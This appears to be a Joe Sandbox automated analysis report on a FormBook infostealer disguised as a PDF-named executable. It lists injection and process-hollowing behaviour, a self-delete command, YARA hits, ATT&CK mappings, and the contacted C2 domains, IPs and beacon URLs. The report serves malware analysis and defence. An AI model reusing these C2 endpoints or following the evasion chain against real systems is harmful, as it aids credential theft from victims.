          Source: C:\Windows\explorer.exe | Domain query: www.quickeasybites.com
          Source: C:\Windows\explorer.exe | Domain query: www.ssfgasia.com
          Source: C:\Windows\explorer.exe | Domain query: www.hzmsbg.com
          Source: C:\Windows\explorer.exe | Network Connect: 199.59.242.153 80
          Source: C:\Windows\explorer.exe | Network Connect: 35.246.6.109 80
          Source: C:\Windows\explorer.exe | Network Connect: 66.96.161.160 80
          Source: C:\Windows\explorer.exe | Network Connect: 216.239.36.21 80
          Source: C:\Windows\explorer.exe | Domain query: www.kf350.com
          Source: C:\Windows\explorer.exe | Domain query: www.1364kensington.com
          Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exe | Domain query: www.desertfoxindustries.com
          Source: C:\Windows\explorer.exe | Domain query: www.pierresplayhouse.com
          Source: C:\Windows\explorer.exe | Domain query: www.thecapitalhut.com
          Source: C:\Windows\explorer.exe | Domain query: www.luegomusic.com
          Contains functionality to prevent local Windows debugging
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Code function: 0_2_72AD1000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Section loaded: unknown target: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\control.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\control.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Thread register set: target process: 3424
          Source: C:\Windows\SysWOW64\control.exe | Thread register set: target process: 3424
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Section unmapped: C:\Windows\SysWOW64\control.exe base address: E70000
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe | Process created: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe 'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe'
          Source: C:\Windows\SysWOW64\control.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe'
          Source: explorer.exe, 00000005.00000002.909699589.0000000000AD8000.00000004.00000020.sdmp | Binary or memory string: ProgmanMD6
          Source: explorer.exe, 00000005.00000000.657552468.0000000001080000.00000002.00000001.sdmp, control.exe, 00000007.00000002.910378473.0000000003020000.00000002.00000001.sdmp | Binary or memory string: Program Manager
          Source: explorer.exe, 00000005.00000000.669092694.0000000005E50000.00000004.00000001.sdmp, control.exe, 00000007.00000002.910378473.0000000003020000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.657552468.0000000001080000.00000002.00000001.sdmp, control.exe, 00000007.00000002.910378473.0000000003020000.00000002.00000001.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.657552468.0000000001080000.00000002.00000001.sdmp, control.exe, 00000007.00000002.910378473.0000000003020000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
          Source: explorer.exe, 00000005.00000000.671246552.000000000A716000.00000004.00000001.sdmp | Binary or memory string: Shell_TrayWnd5D

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match | File source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.692110723.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.909962529.0000000000BF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.692129319.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000001.652124136.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.910020309.0000000000E40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match | File source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.692110723.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.909962529.0000000000BF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.692129319.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000001.652124136.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.910020309.0000000000E40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Native API1 | Path Interception | Process Injection612 | Virtualization/Sandbox Evasion3 | OS Credential Dumping | Security Software Discovery241 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot1
          Default Accounts | Shared Modules1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Process Injection612 | LSASS Memory | Virtualization/Sandbox Evasion3 | Remote Desktop Protocol | Clipboard Data1 | Exfiltration Over Bluetooth | Ingress Tool Transfer3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Deobfuscate/Decode Files or Information1 | Security Account Manager | Process Discovery2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information2 | NTDS | Remote System Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol13 | SIM Card Swap | Carrier Billing Fraud |
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing1 | LSA Secrets | File and Directory Discovery2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | System Information Discovery12 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |

          Behavior Graph

          Behavior Graph ID: 383968 | Sample: RFQ_AP65425652_032421 isu-i... | Startdate: 08/04/2021 | Architecture: WINDOWS | Score: 100

          (graph image not recoverable; node and edge text follows)
          Start node (2): www.lideresdeimmunocal.com; Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 7 other signatures
            -> started: RFQ_AP65425652_032421 isu-isu,pdf.exe 18 (node 11): dropped C:\Users\user\AppData\Local\...\fsfomt.dll, PE32; Maps a DLL or memory area into another process
              -> started: RFQ_AP65425652_032421 isu-isu,pdf.exe (node 15): Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
                -> injected: explorer.exe (node 18): luegomusic.com 162.241.244.61, 49764, 80 UNIFIEDLAYER-AS-1US United States; www.pierresplayhouse.com 199.59.242.153, 49771, 80 BODIS-NJUS United States; 19 other IPs or domains; System process connects to network (likely due to code injection or exploit)
                  -> started: control.exe (node 22): Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                    -> started: cmd.exe 1 (node 25)
                      -> started: conhost.exe (node 27)

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label | Link
          RFQ_AP65425652_032421 isu-isu,pdf.exe | 35% | Virustotal | | Browse
          RFQ_AP65425652_032421 isu-isu,pdf.exe | 42% | ReversingLabs | Win32.Trojan.Wacatac |
          RFQ_AP65425652_032421 isu-isu,pdf.exe | 100% | Joe Sandbox ML | |

          Dropped Files

          Source | Detection | Scanner | Label | Link
          C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll | 23% | ReversingLabs | Win32.Trojan.Wacatac |

          Unpacked PE Files

          Source | Detection | Scanner | Label | Link | Download
          2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
          7.2.control.exe.4ca7960.4.unpack | 100% | Avira | TR/Patched.Ren.Gen | | Download File
          0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
          7.2.control.exe.a0a460.0.unpack | 100% | Avira | TR/Patched.Ren.Gen | | Download File
          0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.72ad0000.5.unpack | 100% | Avira | HEUR/AGEN.1131513 | | Download File
          2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File

          Domains

          No Antivirus matches

          URLs

          Source | Detection | Scanner | Label | Link
          http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe |
          http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe |
          http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe |
          http://www.1364kensington.com/pe0r/?jfIla4=0Af10zgbdIViNGwjb+Oc1SkLmd7m2ZIFRN/3MUqpHhZEI8ml+kTCEnXA5UxsPaJdSh4V&Yn=ybIHhf989FGTI0 | 0% | Avira URL Cloud | safe |
          http://www.thecapitalhut.com/pe0r/?jfIla4=Vv4dR0U6ZhUzqX7Ytdkdbkwy06eZp55JqV7JXJhskJ3M1IOX6fIf5GSNO8ms0pPBZaWn&Yn=ybIHhf989FGTI0 | 0% | Avira URL Cloud | safe |
          http://www.tiro.com | 0% | URL Reputation | safe |
          http://www.tiro.com | 0% | URL Reputation | safe |
          http://www.tiro.com | 0% | URL Reputation | safe |
          http://www.desertfoxindustries.com/pe0r/?jfIla4=z013FEPTRo1x+Iqvqy0nQ5Mm93icoZ0Dm/8PgHcP3O5T8Pkz5lNKJ8Gozvwfum0Zfhau&Yn=ybIHhf989FGTI0 | 0% | Avira URL Cloud | safe |
          http://www.kf350.com/pe0r/?jfIla4=EMcf7Z3h8uf0azWCSj7jkXkAyIPNvPvgl8GMAOH4p84rD0pfCkD41qqmtAVLjT1e92o/&Yn=ybIHhf989FGTI0 | 0% | Avira URL Cloud | safe |
          http://www.goodfont.co.kr | 0% | URL Reputation | safe |
          http://www.goodfont.co.kr | 0% | URL Reputation | safe |
          http://www.goodfont.co.kr | 0% | URL Reputation | safe |
          http://www.tennesseewheelrepair.com/pe0r/?jfIla4=k6IhwNTsJPfJwlNAMD3cJduEXu+3VJeDR1xGn86Kxw1vpoAhQbb58cNQY6a9WWBFRY7O&Yn=ybIHhf989FGTI0 | 0% | Avira URL Cloud | safe |
          https://rootedwithlovejax.com | 0% | Avira URL Cloud | safe |
          http://www.carterandcone.coml | 0% | URL Reputation | safe |
          http://www.carterandcone.coml | 0% | URL Reputation | safe |
          http://www.carterandcone.coml | 0% | URL Reputation | safe |
          www.luegomusic.com/pe0r/ | 0% | Avira URL Cloud | safe |
          http://www.sajatypeworks.com | 0% | URL Reputation | safe |
          http://www.sajatypeworks.com | 0% | URL Reputation | safe |
          http://www.sajatypeworks.com | 0% | URL Reputation | safe |
          http://www.luegomusic.com/pe0r/?jfIla4=DC2ddi2Ahi6YucIUNrYQstcO22XqbhtBVWVPx2koYqqK6B4m9xBdRgLT1ADwKwfYgKFO&Yn=ybIHhf989FGTI0 | 0% | Avira URL Cloud | safe |
          http://www.typography.netD | 0% | URL Reputation | safe |
          http://www.typography.netD | 0% | URL Reputation | safe |
          http://www.typography.netD | 0% | URL Reputation | safe |
          http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe |
          http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe |
          http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe |
          http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe |
          http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe |
          http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe |
          http://fontfabrik.com | 0% | URL Reputation | safe |
          http://fontfabrik.com | 0% | URL Reputation | safe |
          http://fontfabrik.com | 0% | URL Reputation | safe |
          http://www.founder.com.cn/cn | 0% | URL Reputation | safe |
          http://www.founder.com.cn/cn | 0% | URL Reputation | safe |
          http://www.founder.com.cn/cn | 0% | URL Reputation | safe |
          http://www.rootedwithlovejax.com/pe0r/?jfIla4=RrzzznHzvm1EAZS+513FKVr8vjbHVsjAfprUxrbk/aZWUqXE85HdCV+tXjNxRxdlhlWL&Yn=ybIHhf989FGTI0 | 0% | Avira URL Cloud | safe |
          http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe |
          http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe |
          http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe |
          http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe |
          http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe |
          http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe |
          http://www.pierresplayhouse.com/pe0r/?jfIla4=gvANDtPFS4AFIzDAH1LQr3uVNv4G+On6xarGfoEbOyx7OA32EqtB1F0pQLcAKQ6/fBeV&Yn=ybIHhf989FGTI0 | 0% | Avira URL Cloud | safe |
          http://www.%s.comPA | 0% | URL Reputation | safe |
          http://www.%s.comPA | 0% | URL Reputation | safe |
          http://www.%s.comPA | 0% | URL Reputation | safe |
          http://www.sandoll.co.kr | 0% | URL Reputation | safe |
          http://www.sandoll.co.kr | 0% | URL Reputation | safe |
          http://www.sandoll.co.kr | 0% | URL Reputation | safe |
          http://www.ssfgasia.com/pe0r/?jfIla4=edFFfaJfWRXJQQLXD8x02lpY2DcNAoQTA5Xlo1ZOoFa5RERkTfJxxWby4PUnbOfP3siZ&Yn=ybIHhf989FGTI0 | 0% | Avira URL Cloud | safe |
          http://www.urwpp.deDPlease | 0% | URL Reputation | safe |
          http://www.urwpp.deDPlease | 0% | URL Reputation | safe |
          http://www.urwpp.deDPlease | 0% | URL Reputation | safe |
          http://www.zhongyicts.com.cn | 0% | URL Reputation | safe |
          http://www.zhongyicts.com.cn | 0% | URL Reputation | safe |
          http://www.zhongyicts.com.cn | 0% | URL Reputation | safe |
          http://www.sakkal.com | 0% | URL Reputation | safe |
          http://www.sakkal.com | 0% | URL Reputation | safe |
          http://www.sakkal.com | 0% | URL Reputation | safe |

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          luegomusic.com | 162.241.244.61 | true | true | | unknown
          ssfgasia.com | 34.102.136.180 | true | false | | unknown
          desertfoxindustries.com | 184.168.131.241 | true | true | | unknown
          www.rootedwithlovejax.com | 216.239.36.21 | true | false | | unknown
          td-balancer-euw2-6-109.wixdns.net | 35.246.6.109 | true | false | | unknown
          www.kf350.com | 107.178.142.156 | true | true | | unknown
          www.1364kensington.com | 66.96.161.160 | true | true | | unknown
          www.pierresplayhouse.com | 199.59.242.153 | true | true | | unknown
          tennesseewheelrepair.com | 184.168.131.241 | true | true | | unknown
          www.essentials-trading.com | unknown | unknown | true | | unknown
          www.coloradocouponclub.com | unknown | unknown | true | | unknown
          www.tennesseewheelrepair.com | unknown | unknown | true | | unknown
          www.quickeasybites.com | unknown | unknown | true | | unknown
          www.ssfgasia.com | unknown | unknown | true | | unknown
          www.hzmsbg.com | unknown | unknown | true | | unknown
          www.lideresdeimmunocal.com | unknown | unknown | true | | unknown
          www.desertfoxindustries.com | unknown | unknown | true | | unknown
          www.thecapitalhut.com | unknown | unknown | true | | unknown
          www.luegomusic.com | unknown | unknown | true | | unknown

                                                Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          http://www.1364kensington.com/pe0r/?jfIla4=0Af10zgbdIViNGwjb+Oc1SkLmd7m2ZIFRN/3MUqpHhZEI8ml+kTCEnXA5UxsPaJdSh4V&Yn=ybIHhf989FGTI0 | true | Avira URL Cloud: safe | unknown
          http://www.thecapitalhut.com/pe0r/?jfIla4=Vv4dR0U6ZhUzqX7Ytdkdbkwy06eZp55JqV7JXJhskJ3M1IOX6fIf5GSNO8ms0pPBZaWn&Yn=ybIHhf989FGTI0 | false | Avira URL Cloud: safe | unknown
          http://www.desertfoxindustries.com/pe0r/?jfIla4=z013FEPTRo1x+Iqvqy0nQ5Mm93icoZ0Dm/8PgHcP3O5T8Pkz5lNKJ8Gozvwfum0Zfhau&Yn=ybIHhf989FGTI0 | true | Avira URL Cloud: safe | unknown
          http://www.kf350.com/pe0r/?jfIla4=EMcf7Z3h8uf0azWCSj7jkXkAyIPNvPvgl8GMAOH4p84rD0pfCkD41qqmtAVLjT1e92o/&Yn=ybIHhf989FGTI0 | true | Avira URL Cloud: safe | unknown
          http://www.tennesseewheelrepair.com/pe0r/?jfIla4=k6IhwNTsJPfJwlNAMD3cJduEXu+3VJeDR1xGn86Kxw1vpoAhQbb58cNQY6a9WWBFRY7O&Yn=ybIHhf989FGTI0 | true | Avira URL Cloud: safe | unknown
          www.luegomusic.com/pe0r/ | true | Avira URL Cloud: safe | low
          http://www.luegomusic.com/pe0r/?jfIla4=DC2ddi2Ahi6YucIUNrYQstcO22XqbhtBVWVPx2koYqqK6B4m9xBdRgLT1ADwKwfYgKFO&Yn=ybIHhf989FGTI0 | true | Avira URL Cloud: safe | unknown
          http://www.rootedwithlovejax.com/pe0r/?jfIla4=RrzzznHzvm1EAZS+513FKVr8vjbHVsjAfprUxrbk/aZWUqXE85HdCV+tXjNxRxdlhlWL&Yn=ybIHhf989FGTI0 | false | Avira URL Cloud: safe | unknown
          http://www.pierresplayhouse.com/pe0r/?jfIla4=gvANDtPFS4AFIzDAH1LQr3uVNv4G+On6xarGfoEbOyx7OA32EqtB1F0pQLcAKQ6/fBeV&Yn=ybIHhf989FGTI0 | true | Avira URL Cloud: safe | unknown
          http://www.ssfgasia.com/pe0r/?jfIla4=edFFfaJfWRXJQQLXD8x02lpY2DcNAoQTA5Xlo1ZOoFa5RERkTfJxxWby4PUnbOfP3siZ&Yn=ybIHhf989FGTI0 | false | Avira URL Cloud: safe | unknown

                                                URLs from Memory and Binaries

          Name | Source | Malicious | Antivirus Detection | Reputation
          http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | false | | high
          http://www.fontbureau.com | explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | false | | high
          http://www.fontbureau.com/designersG | explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | false | | high
          http://www.fontbureau.com/designers/? | explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | false | | high
          http://www.founder.com.cn/cn/bThe | explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (3 entries) | unknown
          http://www.fontbureau.com/designers? | explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | false | | high
          http://www.tiro.com | explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (3 entries) | unknown
          http://www.fontbureau.com/designers | explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | false | | high
          https://lh5.googleusercontent.com/tnT1qBMzmyLgRDNYg3gq78quEpuZVERk849E090SPkl3uZ90NtOdF0DdK28eDthwrR | control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmp | false | | high
          http://www.goodfont.co.kr | explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (3 entries) | unknown
          https://rootedwithlovejax.com | control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.carterandcone.coml | explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (3 entries) | unknown
          http://www.sajatypeworks.com | explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (3 entries) | unknown
          http://www.typography.netD | explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (3 entries) | unknown
          http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | false | | high
          http://www.founder.com.cn/cn/cThe | explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (3 entries) | unknown
          http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (3 entries) | unknown
          http://fontfabrik.com | explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (3 entries) | unknown
          http://www.founder.com.cn/cn | explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (3 entries) | unknown
          http://www.fontbureau.com/designers/frere-user.html | explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | false | | high
          http://www.jiyu-kobo.co.jp/ | explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (3 entries) | unknown
          http://www.galapagosdesign.com/DPlease | explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (3 entries) | unknown
          http://www.fontbureau.com/designers8 | explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | false | | high
          http://www.%s.comPA | explorer.exe, 00000005.00000000.660312730.0000000002B50000.00000002.00000001.sdmp | false | URL Reputation: safe (3 entries) | low
          http://www.fonts.com | explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | false | | high
          http://www.sandoll.co.kr | explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (3 entries) | unknown
          http://www.urwpp.deDPlease | explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (3 entries) | unknown
          http://www.zhongyicts.com.cn | explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (3 entries) | unknown
          http://www.sakkal.com | explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (3 entries) | unknown

                                                                      Contacted IPs

                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs

                                                                      Public

          IP | Domain | Country | ASN | ASN Name | Malicious
          199.59.242.153 | www.pierresplayhouse.com | United States | 395082 | BODIS-NJUS | true
          35.246.6.109 | td-balancer-euw2-6-109.wixdns.net | United States | 15169 | GOOGLEUS | false
          66.96.161.160 | www.1364kensington.com | United States | 29873 | BIZLAND-SDUS | true
          216.239.36.21 | www.rootedwithlovejax.com | United States | 15169 | GOOGLEUS | false
          107.178.142.156 | www.kf350.com | United States | 8100 | ASN-QUADRANET-GLOBALUS | true
          162.241.244.61 | luegomusic.com | United States | 46606 | UNIFIEDLAYER-AS-1US | true
          34.102.136.180 | ssfgasia.com | United States | 15169 | GOOGLEUS | false
          184.168.131.241 | desertfoxindustries.com | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | true

                                                                      General Information

                                                                      Joe Sandbox Version:31.0.0 Emerald
                                                                      Analysis ID:383968
                                                                      Start date:08.04.2021
                                                                      Start time:13:20:33
                                                                      Joe Sandbox Product:CloudBasic
                                                                      Overall analysis duration:0h 9m 12s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:light
                                                                      Sample file name:RFQ_AP65425652_032421 isu-isu,pdf.exe
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                      Number of analysed new started processes analysed:21
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:1
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • HDC enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.evad.winEXE@7/3@17/8
                                                                      EGA Information:Failed
                                                                      HDC Information:
                                                                      • Successful, ratio: 63.2% (good quality ratio 58.2%)
                                                                      • Quality average: 74.2%
                                                                      • Quality standard deviation: 30.5%
                                                                      HCA Information:
                                                                      • Successful, ratio: 99%
                                                                      • Number of executed functions: 0
                                                                      • Number of non-executed functions: 0
                                                                      Cookbook Comments:
                                                                      • Adjust boot time
                                                                      • Enable AMSI
                                                                      • Found application associated with file extension: .exe
                                                                      Warnings:
                                                                      • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                      • TCP Packets have been reduced to 100
                                                                      • Excluded IPs from analysis (whitelisted): 23.54.113.53, 104.43.139.144, 52.147.198.201, 168.61.161.212, 52.255.188.83, 20.82.210.154, 23.10.249.26, 23.10.249.43, 93.184.221.240, 52.155.217.156, 20.54.26.129
